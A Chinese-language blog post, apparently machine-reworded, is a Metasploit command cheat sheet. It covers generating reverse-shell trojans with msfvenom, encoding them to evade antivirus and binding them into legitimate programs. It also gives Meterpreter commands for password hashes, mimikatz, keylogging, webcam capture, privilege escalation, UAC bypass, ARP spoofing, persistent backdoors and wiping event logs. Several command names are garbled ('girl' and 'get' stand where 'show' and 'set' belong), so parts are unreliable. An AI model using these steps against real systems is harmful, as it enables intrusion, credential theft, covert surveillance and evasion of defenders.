MSF常用命令

L_lemo004發表於2020-10-20

Msf是kali下的這款強勁的專用工具,開源系統的網路安全問題測試工具前滲入後滲入環節都用獲得,只有還是後滲入環節用的多。

Msf用途大概就是說exploit進攻,cve進攻,遠端控制木馬病毒進攻運用。

Msfconsole 開啟msf

Msfconsole -h 協助選擇項

Banner 用以查詢metasploit的版本資訊,運用控制模組總數、payload總數

控制模組詳細介紹:

Exploits 滲入進攻控制模組 主要用於進攻方式

Auxiliary 輔助控制模組 主要用於資訊內容蒐集

Payloads 進攻荷載控制模組 主要用於進攻實際效果、總體目標

Encodes 編號控制模組 主要用於編碼轉換、掩藏

Post 後滲透測試控制模組 主要用於滲入後的解決,比如留有側門等

通常應用步驟:

search 名字 檢索系統漏洞

use 控制模組 挑選進攻控制模組

get RHOST ip 設定進攻ip

get RPORT 445 設定進攻埠號

girl payloads 查詢能用payloads

get payload windows/meterperter/bind_tcp -設定進攻荷載

get LHOST ip 監視應用程式ip

get LPORT 4444 設定監視的埠號

girl options 查詢設定好的主要引數

exploit 進行進攻

info 查詢所屬控制模組的資訊內容

back 撤出當今系統漏洞控制模組,挑選別的的系統漏洞控制模組

exploits:運用漏洞開展進攻

payload:取得成功 exploit 以後,真實在總體目標系統軟體實行的編碼或命令

connect 用以遠端控制連線伺服器,通常用以內部網滲入。

connect 192.168.9.1 8080 connect+iP+伺服器埠

exit 撤出msfconsole的指令。

search 系統漏洞名字 開展系統漏洞控制模組或軟體的搜尋

遠端控制木馬病毒:

轉化成Shellcode指令:

msfvenom -p windows/meterpreter/reverse_tcp lhost=ip lport=埠號 -f exe -o /root/feizhu/fz.exe

Msfvenom適用諸多自然環境下payload有效載荷,如linux,android,windons等

應用指令查詢msfvenom –list payloads 依據必須挑選荷載

對shellcode開展編號:

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 13 -b ‘\x00’ lhost=ip lport=埠號 -f exe -o /root/feizhu/zhu.exe

Msfvenom適用的伺服電機許多,每一伺服電機的免殺實際效果都不同,依據必須挑選。

查詢伺服電機 msfvenom –list encoders

注:並不一定的編碼方式都會windows系統軟體上能用

Msf終究是開源系統的,免殺實際效果不太好。

我們普遍的免殺方法有:改動特徵碼/改動程式流程通道點/花指令/加殼等

將轉化成的木馬病毒捆縛到別的程式流程中:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=ip LPORT=埠號 -e x86/shikata_ga_nai -x IPradar5.exe(捆縛的程式流程) -i 13 -k(將系統程式提取) -f exe -o /root/feizhu/fz.exe

監視shellcode (當木馬病毒在總體目標機實行後,用此作用取得應用程式,深化滲入)

use exploit/multi/handler 挑選控制模組

get payload windows/meterpreter/reverse_tcp 設定的payload荷載要跟我們轉化成木馬病毒時的荷載相同。

get LHOST ip 設定監視的ip

get LPORT 4444 設定監視的埠號

exploit 剛開始監視,進行此步後,在總體目標裝置實行木馬病毒只能取得session應用程式。

需注意payload微小差別:

人們挑選的payload監聽器是有差別的:

windows/shell_reverse_tcp 這一是歸屬於Unstaged。即必須應用nc監視埠號來拿

到反跳shell 。 比如:nc -nvlp [伺服器埠]

windows/shell/reverse_tcp 這一是歸屬於Staged。即必須應用msf的

exploit/multi/handler來取得session應用程式。

那麼根據系統漏洞進攻或是遠端控制木馬病毒取得sessions應用程式以後,更進一步滲入,則必須的指令給出:

Meterpreter應用程式下:

background 把meterpreter後臺管理離線

sessions -l 查詢全部的應用程式

sessions -i 1 挑選應用程式

shell 獲得總體目標伺服器的遠端命令列shell

ipconfig 查詢網際網路主要引數

getwd 獲得系統軟體工作中的當前目錄

getuid 查詢早已得到的管理許可權

portfwd 埠轉發 總體目標伺服器上開啟了3389,可是隻容許特殊iP瀏覽,進攻伺服器沒法聯接,可以應用portfwd指令把總體目標伺服器的3389埠轉發到別的埠號開啟

portfwd Add -l 你該機的監視埠號 -r 127.0.0.1 -p 3389 將總體目標裝置3389傳送到kali當地埠號

rdesktop 127.1.1.0:2222 實行windows遠端控制連線,這一埠號就是說上一步傳送的埠號。

upload 檔案上傳到總體目標伺服器

upload fz.exe C:\windows\system32\

download 將總體目標伺服器上的檔案下載到人們的進攻伺服器上

download C:\users\wd.txt /root/feizhu/

search -d c:\ -f *.doc 檢索特定尾綴文件

route 顯示資訊總體目標伺服器上的伺服器路由表

sysinfo 查詢總體目標主機系統資訊內容

systeminfo 查詢系統軟體詳細資料及傻瓜包資訊內容

migrate將meterpreter應用程式移殖到另外系統程式

migrate 1668(引入系統程式的pid) 將木馬病毒系統程式引入到系統軟體別的系統程式

hashdump 載入雜湊值

load mimikatz 起動mimikatz

wdigest 載入?沒藶耄╩imikatz下指令)

run getgui -e 開啟遠端桌面服務

run getgui -u feizhu -p feizhu 加上登入遠端桌面的賬戶密碼

提權:

應用程式下要getsystem 取得系統軟體最大許可權

取得meterpreter應用程式後提高最大許可權:

1.systeminfo 查詢漏洞補丁資訊內容,搜尋有關上溢系統漏洞提權

2.use+系統漏洞控制模組 應用系統漏洞控制模組

3.get sessions 1 設定開展提權的應用程式裝置

11.查詢回到資訊內容,會有個新的system管理許可權系統程式,用migrate將本來的應用程式系統程式引入到system系統程式中,取得最大許可權。

應用Bypassuac提權:(當實行getsystem失效時)

1.search bypassuac 檢索控制模組

2.use 控制模組名字 應用控制模組

3.get sessions 應用程式名字 挑選提權的應用程式

11.run 實行

4.會回到1個新的應用程式,進入應用程式若不是最大許可權,實行getsystem只能。

取得meterpreter應用程式後怎麼才能合理的提權呢?

大夥兒瞭解msf中內建的系統漏洞控制模組過多,全部我們可以用msf內建指令協助我們開展提權。

1.把session應用程式掛上去後臺管理

2. use post/multi/recon/local_exploit_suggester

3.get LHOST ip

11.get session 1

4.exploit

實行以後見到的結果就是說對於當今系統軟體將會提權取得成功的漏洞利用控制模組。

鍵盤記錄器作用keyscan:

keyscan_start 開啟紀錄總體目標伺服器的鍵盤輸入

keyscan_dump 輸出捕獲到的總體目標鍵盤輸入空格符資訊內容

keyscan_stop 終止鍵盤記錄

run vnc 開啟實時監控介面

webcam_stream 開啟監控攝像頭

migrate 616 關掉另一方伺服器防火牆

screenshot 手機截圖

後滲入控制模組應用:

run post/windows/gather/enum_applications 獲得總體目標伺服器程式安裝資訊內容

run post/windows/gather/dumplinks獲得總體目標伺服器上近期瀏覽過的文字文件、連線資訊內容

run post/windows/gather/enum_Ie 載入總體目標伺服器ie瀏覽器電腦瀏覽器cookies等快取檔案資訊內容,嗅探總體目標伺服器登陸過的各種賬戶密碼,資訊內容儲放在/root/.msf5/loot/檔案目錄下。

msf路由器傳送控制模組:

MSF架構中內建的1個路由器傳送作用,其保持全過程就是說MSF架構在早已獲得的meterpreter shell的基本上加上這條前往“內部網”的路由器,此路由器的下一個跳傳送,即閘道器ip是MSF進攻服務平臺與黑客攻擊總體目標建立的1個session應用程式 。

run set_local_subnets 查詢已拿到的總體目標伺服器的內部網iP段狀況(路由器詳細地址)

run autoroute -s ip/28 加上路由器(把這一ip段範疇加進路由器)

run autoroute -p 查詢加上的路由器

+run autorouute -d 刪掉加上的路由器

隨後,我們能用進攻內部網別的裝置:

fping -asg 192.168.93.0/28 查詢內部網免費線上伺服器

arpspoof -i eth0 -t 總體目標iP 閘道器ipiP ARP矇騙

長久側門:

run persistence -S -U -X -i 5 -p 埠號 -r ip

-S:開機啟動時載入

-U:客戶登入時載入

-X:啟動時全自動載入

-i:回連的間隔時間

-r:你的接受shell的電腦上iP

clearev 擦掉印痕

相關文章